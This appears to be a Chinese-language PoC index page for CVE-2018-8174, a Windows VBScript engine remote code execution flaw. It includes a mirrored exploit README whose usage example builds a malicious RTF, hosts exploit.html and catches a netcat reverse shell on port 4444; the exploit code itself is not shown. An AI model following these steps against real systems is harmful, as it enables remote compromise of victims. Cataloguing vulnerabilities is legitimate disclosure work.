CVE-2018-8174 PoC — Microsoft Windows VBScript引擎缓冲区错误漏洞

来源

https://github.com/Yt1g3r/CVE-2018-8174_EXP

关联漏洞

标题:Microsoft Windows VBScript引擎缓冲区错误漏洞 (CVE-2018-8174)
Description:Microsoft Windows 7等都是美国微软（Microsoft）公司发布的一系列操作系统。Windows VBScript engine是其中的一个VBScript（脚本语言）引擎。 Microsoft Windows VBScript引擎中存在远程代码执行漏洞。远程攻击者可利用该漏洞在当前用户的上下文中执行任意代码，造成内存损坏。以下系统版本受到影响：Microsoft Windows 7，Windows Server 2012 R2，Windows RT 8.1，Windows Server

Description

CVE-2018-8174_python

介绍

# CVE-2018-8174_EXP
usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     exp url
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i IP, --ip IP        ip for netcat
  -p PORT, --port PORT  port for netcat

eg:
1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
2. put exploit.html on your server （1.1.1.1）
3. netcat listen  on [any] 4444 (2.2.2.2)

enjoy it !

文件快照


 [4.0K]  /data/pocs/f0a7c38e1c79273cfd226f9d23dc12106f5d061f
├── [ 19K]  CVE-2018-8174.py
└── [ 585]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2018-8174 PoC — Microsoft Windows VBScript引擎缓冲区错误漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！